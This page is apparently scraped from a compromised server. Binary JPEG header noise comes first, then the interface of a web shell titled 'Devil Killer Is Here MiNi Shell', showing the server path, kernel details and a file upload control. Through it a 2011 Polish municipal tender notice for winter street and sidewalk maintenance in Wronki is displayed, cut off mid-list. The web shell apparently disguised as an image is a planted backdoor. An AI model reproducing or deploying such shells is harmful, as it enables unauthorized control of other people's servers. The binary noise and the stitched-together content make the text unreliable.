JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111012/268615-N-2011.html

<p class="kh_header"><b>Wronki: Zimowe utrzymanie ulic, chodników, placów, parkingów i zatok na terenie miasta Wronki w latach 2011-2013</b><br>
<b>Numer ogłoszenia: 268615 - 2011; data zamieszczenia: 12.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wronki reprezentowana przez Burmistrza Miasta i Gminy , ul. Ratuszowa 5, 64-510 Wronki, woj. wielkopolskie, tel. 067 2545300, faks 067 2545328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wronki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie ulic, chodników, placów, parkingów i zatok na terenie miasta Wronki w latach 2011-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I) Przedmiot zamówienia obejmuje zimowe utrzymanie ulic, chodników, placów, parkingów, zatok na terenie miasta Wronki w latach 2011-2013 w następujących wielkościach: 
a) odśnieżanie chodników, placów, parkingów i zatok w ilości ca 30.000,00 m2,
b) odśnieżanie mechaniczne ulic na terenie miasta w ilości ca 30.000,00 mb,
II) Wykaz ulic, placów, parkingów, chodników i zatok na terenie miasta Wronki objętych zimowym utrzymaniem z podziałem na okręgi.
HARMONOGRAM  PRAC
Okręg I
Lp.	Nr drogi	Nazwa ulicy	Długość
[mb]	Parkingi, zatoki itp.
[m2]
1.	250085 P	Spokojna	98	
2.	250084 P	Plac Wolności + parking przed przedszkolem	383	1200
3.	 - 	Plac Targowy na całej jego powierzchni w każdy poniedziałek i czwartek	-	12220
4.	 - 	Droga koło Szkoły Podstawowej nr 2	180	
5.	250079 P	Kościuszki	212	
6.	250076 P	Rzeczna	436	
7.	250077 P	Zwycięzców 	100	
8.	250080 P	Rynek	624	278
9.	250075 P	Wodna	112	
10.	250074 P	Szpitalna	74	
11.	250073 P	Podgórna	88	
12.	250072 P	Garncarska	201	
13.	250081 P	Kościelna	136	
14.	250082 P	Kręta	133	
15.	250093 P	Krótka	65	
16.	250078 P	Szkolna	82	
17.	250086 P	dr I. Zimniaka	192	
18.	250119 P	ul. Dworcowa (do stacji PKP)	1471	455
19.	250091 P	Polna (koło PKS i koło szkoły)	894	
20.	250088 P	Niepodległości	517	
21.	250089 P	Partyzantów + parking przed Przychodnią	478	120
22.	250090 P	Lipowa 	163	
23.	250087 P	Ratuszowa + parking przed Ratuszem	158	63,75
24.	250091 P	Polna	894	
25.	 - 	os. Staszica	260	
26.	 - 	os. Słowackiego	635	785
27.	250115 P	Słoneczna	246	
28.	 - 	os. Borek + dojazd do kościoła	1632	1404
29.	250116 P	Prasłowiańska	520	
30.	250117 P	Cienista - Hajtkowo	400	
Okręg II
Lp.	Nr drogi	Nazwa ulicy	Długość
[mb]	Parkingi, zatoki itp.
[m2]
1.	250097 P	Al. Wyzwolenia	1050	 
2.	 	Brzoskwiniowa	270	 
3.	250114 P	Czereśniowa	342	 
4.	250113 P	Orzechowa	276	 
5.	250112 P	Wiśniowa	451	 
6.	250111 P	Jabłoniowa	292	109
7.	250110 P	Morelowa	580	 
8.	250092 P	Towarowa	1145	 
9.	 - 	Warzywna	174	 
10.	250094 P	Sadowa	158	 
11.	250095 P	Działkowa	841	 
12.	 - 	Waniliowa	110	 
13.	 - 	Słonecznikowa	325	 
14.	 - 	miodowa	210	 
15.	250096 P	Graniczna	91	 
16.	250098 P	Piękna	326	 
17.	250101 P	Wspólna	238	 
18.	250100 P	Radosna	347	 
19.	250099 P	Wiatraczna	72	 
20.	250103 P	Ukośna	208	 
21.	205104 P	Jaśminowa	55	 
22.	250106 P	 Kwiatowa	140	 
23.	250102 P	Wiosenna	140	 
24.	250107 P	Różana	260	 
25.	250108 P	Kameliowa	73	 
26.	250109 P	 Azaliowa	218	 
27.	250105 P	Zaułek	64	 
28.	250113 P	Orzechowa	276	 
29.	250112 P	Wiśniowa	451	 
Okręg III
Lp.	Nr drogi	Nazwa ulicy	Długość
[mb]	Parkingi, zatoki itp.
[m2]
1.	 - 	Olszynki	300	 150
2.	250062 P	Jaworowa	226	70
3.	250061 P	Łąkowa	1020	 
4.	250068 P	Piaskowa	680	 
5.	250067 P	Łowiecka	450	 
6.	250069 P	Nadbrzeżna	1028	 
7.	250066 P	Rolna	425	 
8.	250071 P	Leśna	1061	 
9.	250055 P	Zacisze	654	 
10.	250051 P	Wierzbowa	367	 
11.	250053 P	Dębowa	938	 
12.	250052 P	Ogrodowa	745	 
13.	250064 P	Pogodna	189	 
14.	250059 P	Topolowa	344	 
15.	250063 P	Bukowa	158	 
16.	250064 P	Grabowa	117	 
17.	250060 P	Klonowa	122	 
18.	250058 P	Brzozowa	132	 
19.	250057 P	Świerkowa	281	 
20.	250056 P	Sosnowa	140	 


Lp.	CHODNIKI	Powierzchnia
[m2]
1.	Rynek 8 (chodnik przed budynkiem)	12,00
2.	Kręgielnia (chodnik i jezdnia wokół całego budynku)	75,00
3.	Poznańska 38 (chodnik wzdłuż budynku)	4,00
4.	Polna 3A-B (chodnik przed i za budynkiem, teren działki - parking)	200,00
5.	Kościuszki 6 (chodnik od ulicy, szczytu budynku i podwórza)	40,00
6.	Kościuszki 8 (chodnik od ulicy)	7,50
7.	Kościuszki 22 (chodnik od ulicy)	8,00
8.	Plac Wolności 10 (chodnik wzdłuż budynku) i alejki	3533,00
9.	Powstańców Wlkp. 21 (chodnik wewnętrzny na posesji, plac przed budynkiem, chodnik przy ulicy)	138,00
10.	Powstańców Wlkp. 23 ( chodnik przed budynkiem i od strony podwórza, parking przed budynkiem)	100,00
11.	Powstańców Wlkp. 28 (chodnik)	60,00
12.	Sierakowska 24 (chodnik przed posesja od strony ul. Sierakowskiej i ul. Rzecznej)	10,00
13.	Sierakowska 44 (chodnik przed budynkiem i teren posesji)	20,00

14.	Partyzantów 14 (chodnik na całej działce oraz przy ul. Partyzantów + parking)	1404,00
15.	Mickiewicza 57 (chodnik przed budynkiem)	57,00
17.	Nowa 2	30,00
18.	Ratuszowa	19,50
19.	Słowiańskie	240,00
20.	ul. Orzechowa - ul. Jabłoniowa (przełazek)	212,00
21.	ul. Niepodległości	2000,00
22.	ul. Ratuszowa	735,00
23.	ul. Dworcowa	1800,00
24.	os. Borek (koło kościoła)	193,00
			

III) STANDARDY ZIMOWEGO UTRZYMANIA ULIC , CHODNIKÓW, PLACÓW, PARKINGÓW, ZATOK NA TERENIE MIASTA WRONKI W LATACH 2011 - 2013.

1.	Zimowe utrzymanie ulic, chodników, placów, parkingów, zatok polegać będzie na usuwaniu śliskości, gołoledzi oraz odśnieżaniu.
2.	Prace związane z usuwaniem śniegu, lodu i gołoledzi oraz posypywaniem mieszanką piasku 
z solą prowadzone będą w godzinach wczesnorannych, tak aby całkowite zakończenie prac nastąpiło każdego dnia:
A.	do godziny 7.00 - Okręg I
B.	do godziny 8.00 - Okręg II
C.	do godziny 9.00 - Okręg III
W przypadku wystąpienia konieczności wykonania prac również w pozostałych godzinach, zgodnie z obowiązującym standardem (Dział V).

Wykaz poszczególnych ulic, placów, parkingów, zatok wchodzących w skład danego okręgu przedstawiono w Działach II.

3.	Wykonawca zobowiązany jest do pełnienia dyżurów w dni wolne od pracy i w przypadku wystąpienia opadów lub śliskości, podejmować samodzielne czynności określone w umowie zawartej z Zamawiającym. O powyższym Wykonawca zobowiązany będzie do powiadomienia telefonicznie Zamawiającego. 
4.	Wykonawca zobowiązany jest do wykonywania zleconych prac zgodnie z obowiązującym  standardem zimowego utrzymania (Dział VI) i harmonogramem prac (Działy II i III).
5.	W przypadku wystąpienia utrudnień w wykonaniu prac (awaria sprzętu itp.) Wykonawca niezwłocznie powiadamia telefonicznie Zamawiającego, odnotowując zaistniałą sytuację  w karcie pracy sprzętu.
6.	W przypadku awarii pojazdu, sprzętu Wykonawca zapewnia pojazd, sprzęt o porównywalnych parametrach technicznych w czasie nie dłuższym niż 2 godziny, od momentu pojawienia się awarii.
7.	Wykonawca powinien dysponować sprzętem oraz materiałem w ilości zapewniającej prawidłowe, skuteczne i ciągłe zwalczanie śliskości i gołoledzi oraz odśnieżanie chodników, placów, parkingów, zatok, ulic i dróg na terenie miasta i gminy Wronki.
8.	Pojazdy uczestniczące w odśnieżaniu i posypywaniu dróg powinny być sprawne technicznie  i odpowiednio oznakowane.

IV) STANDARDY RĘCZNEGO ZIMOWEGO UTRZYMANIA CHODNIKÓW, PLACÓW, PARKINGÓW, ZATOK, NA TERENIE MIASTA WRONKI W LATACH 2011-2013.

1.	Odśnieżanie oraz likwidację śliskości placów, parkingów oraz zatok należy przeprowadzać na całej ich powierzchni, zgodnie z wykazem zawartym w Dziale II.
2.	Odśnieżanie chodników wykonać należy na całej szerokości i długości, z jednoczesnym składowaniem zgarnianego śniegu na poboczach chodników. W przypadku chodników o szerokości ponad 2 m dopuszcza się odśnieżanie i posypywanie na szerokości min. 2 m.
3.	Odśnieżanie chodników obejmuje także usuwanie zalegającego śniegu na zejściach i dojściach do przejść dla pieszych oraz fragmentu przejść dla pieszych, na których zalegają śnieg, lód lub błoto pośniegowe odgarnięte z dróg.
4.	Zgarnianie śniegu z chodników znajdujących się przy krawędzi jezdni należy wykonywać na pobocze chodnika tak, by nie zasypywać jezdni.
5.	W przypadku nagromadzenia się nadmiernej ilości śniegu przy krawędzi chodnika uniemożliwiającej poruszanie się po nim należy usunąć nadmierną ilość śniegu poprzez jego wywiezienie na osobne polecenie Zamawiającego. 
6.	Posypywanie środków uszorstniających (piasku lub mieszanki piasku z solą) z jednoczesnym odśnieżaniem należy wykonać na maksymalnej szerokości chodnika.
7.	Całkowite zakończenie odśnieżania i likwidacja śliskości zimowej na chodnikach (gołoledź, zlodowacenia, itp.) następować będzie najpóźniej do godziny 9.00 każdego dnia, a w  przypadku wystąpienia takiej konieczności, również w innych godzinach wg wskazań Zamawiającego. 
8.	W przypadku bardzo intensywnych ciągłych opadów śniegu dopuszcza się pozostawienie 
na nawierzchni chodników cienkiej, równomiernej warstwy śniegu ( do 5 cm). Po polepszeniu się warunków atmosferycznych zgromadzony na nawierzchni śnieg należy zgarnąć do krawędzi. 

V) STANDARDY MECHANICZNEGO ZIMOWEGO UTRZYMANIA ULIC NA TERENIE MIASTA WRONKI W LATACH 2011-2013.

Standard	Opis warunków ruchu na jezdni	Dopuszczalne odstępstwa od standardu po ustaniu zjawisk
ŚNIEG	Dopuszczalne odstępstwa od standardu po ustaniu zjawisk
ŚLISKOŚĆ ZIMOWA
III	Jezdnia odśnieżona na całej szerokości. 

Jezdnia posypana na:
- skrzyżowaniach z drogami,
- skrzyżowaniach z koleją,
- odcinkach o pochyleniu powyżej 4%,
- przystankach autobusowych,
- innych miejscach wskazanych przez Zamawiającego	- luźny - 6 h,
- błoto pośniegowe - występuje,
- zaspy, języki śnieżne lokalne - 6h,
- utrudnienia dla samochodów osobowych	
W miejscach wyznaczonych:
- gołoledź - 5h,
- szron - 5h,
- szadź - 5h,
- pośniegowa - 5h,
- lodowica - 6h.


VI) INFORMACJE DODATKOWE:
1. W przypadku zalegania nadmiaru śniegu na ulicach, drogach, chodnikach, placach, parkingach i zatokach, Wykonawca zobowiązany będzie do jego wywozu na telefoniczne polecenie osoby odpowiedzialnej ze strony Zamawiającego w miejsce przez niego wskazane. 
2. Załadunek śniegu będzie się odbywał za pomocą ładowarki lub koparko-ładowarki na samochody ciężarowe samowyładowcze i wywożony na teren wskazany przez Zamawiającego. Prace będą wykonywane zgodnie ze zleceniem Zamawiającego (nie wyłączając godzin nocnych). W przypadku pozostania śniegu na chodniku, parkingu lub jezdni, w ilości niemożliwej do załadowania przez ładowarkę lub koparko-ładowarkę, należy załadować go ręcznie.
3. Zamawiający będzie wskazywał miejsce do załadunku i wywozu śniegu.  Maksymalna odległość na jaką będzie wywożony śnieg wynosi 3 km.
4. W przypadku nienależytego i nieterminowego wykonywania usługi określonej w umowie Wykonawca zostanie obciążony karą umowną w wysokości 1000,00 zł za każdą dobę, w której wystąpiły nieprawidłowości.
5. Wykonawca zobowiązuje się świadczyć usługi objęte umową z należytą starannością, zgodnie ze swoją najlepszą wiedzą i doświadczeniem oraz przy zachowaniu obowiązujących przepisów prawa.
6. Zamawiający zastrzega sobie prawo do dokonywania potrąceń kar z bieżącej należności Wykonawcy.
7. Wykonawca ponosi pełną odpowiedzialność cywilną za szkody i straty oraz następstwa nieszczęśliwych wypadków i zdarzeń losowych, dotyczących pracowników i osób trzecich oraz ich mienia, powstałych w związku z realizacją umowy. Wykonawca ponosi odpowiedzialność za szkody i następstwa wynikłe podczas wykonywania lub nienależytego wykonywania umowy. Zamawiający zastrzega sobie możliwość potrącenia z wynagrodzenia Wykonawcy ewentualnych kwot wynikających z wyrządzonej szkody w mieniu. Wykonawca jest zobowiązany do posiadania polisy ubezpieczeniowej OC obejmującej ubezpieczenie deliktowe i kontraktowe w zakresie prowadzonej działalności na kilka zdarzeń równocześnie, ważnej przez cały okres umowy.
8. Czynności kontrolne:
A. W okresie trwania umowy Wykonawca ma obowiązek zapewnienia stałego kontaktu Zamawiającego ze swoim przedstawicielem. Wykonawca bierze na siebie odpowiedzialność za to, aby pod wskazanym numerem telefonu dyżurowała osoba mogąca skutecznie przyjmować zgłoszenia przekazywane przez Zamawiającego. Zamawiający nie dopuszcza korzystania przez Wykonawcę w tym celu tzw. automatycznej sekretarki.
B. Kontrola dokonywana będzie przez przedstawiciela Zamawiającego.
C. Niezgodność wykonywania usługi stwierdzana będzie przez przedstawiciela Zamawiającego w obecności przedstawiciela Wykonawcy lub bez przedstawiciela Wykonawcy, w przypadku jego nieprzybycia na wezwanie Zamawiającego na miejsce kontroli.
D. Wymaga się aby przedstawiciel Wykonawcy był w stanie dotrzeć do Zamawiającego  w ciągu jednej godziny od telefonicznego wezwania. Nieprzybycie Wykonawcy  w wyznaczonym czasie stanowić będzie podstawę do naliczania kary umownej z tytułu niewykonywania lub nienależytego wykonywania przedmiotu umowy.

E. Zamawiający ma prawo do kontroli wykonywania przedmiotu zamówienia o każdej porze.
F. Z przeprowadzonej kontroli sporządzony będzie protokół, zawierający: datę, godzinę  i miejsce kontroli, imię i nazwisko osób kontrolujących, stwierdzenie uwag w trakcie kontroli, wnioski z kontroli. Do protokołu można będzie załączyć dokumentację fotograficzną. 

9. W ramach obowiązków umownych, Wykonawca ma obowiązek każdego dnia po zakończeniu prac (także w wolnym od pracy Urzędu Miasta i Gminy), w którym jest realizowany przedmiot umowy, przesłania Zamawiającemu zestawienia wykonanych w danym dniu prac: nazwa dróg, ulic, placów, parkingów, chodników i zatok, gdzie były prowadzone prace związane  
z zimowym utrzymaniem. Informacja będzie sporządzona przez Wykonawcę  i przesłana faxem na nr 67 25 45 328 lub pocztą elektroniczną na adres e-mail: drogi@wronki.pl

VII) POTENCJAŁ TECHNICZNY.

Wykonawca zobowiązany jest do dysponowania następującym potencjałem technicznym:
1. Ciągnik z przyczepą - 2 sztuki.
2. Pług śnieżny - 2 sztuki.
3. Posypywarka - 2 sztuki.
4. Fadroma, koparko-spycharka - 1 sztuka..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli wykaże, że dysponuje lub będzie dysponował  następującym sprzętem:
1.	Ciągnik z przyczepą - 2 sztuki.
2.	Pług śnieżny - 2 sztuki.
3.	Posypywarka - 2 sztuki.
4.	Fadroma, koparko-spycharka- 1 sztuka.

W sytuacji, gdy Wykonawca wskazał sprzęt, którym będzie dysponował zobowiązany jest do przedstawienia pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnego potencjału technicznego na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 50.000,00 zł. (słownie: pięćdziesiąt tysięcy złotych 00/100).
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć opłaconą polisę, a w przypadku jej braku - inny dokument, potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Dokument ten ma być aktualny, tj. taki którego ważność upływa nie wcześniej niż na dzień składania ofert. Jeżeli z załączonej polisy, bądź innego dokumentu nie wynika, że został(a) opłacona(y), wówczas należy załączyć dokument to potwierdzający (dowód zapłaty).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ponadto przedkłada:
1)	Formularz oferty (sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ).
2)	Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (w przypadku składania oferty wspólnej lub gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Zamawiającego.
2.	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
3.	Zmiany umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy Prawo zamówień publicznych, stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia.
4.	Zmiany, o których mowa w ust. 1 mogą dotyczyć:
1)	rezygnacji z wykonania części usług,
2)	zmiany wynagrodzenia Wykonawcy w następstwie zmiany przepisów o podatku od towarów i usług (VAT). W przypadku podwyższenia stawki VAT wynagrodzenie w zł brutto ulegnie podwyższeniu, a w przypadku obniżenia - zmniejszeniu. Zmiana stawki VAT nie wpłynie na zmianę cen jednostkowych w zł netto,
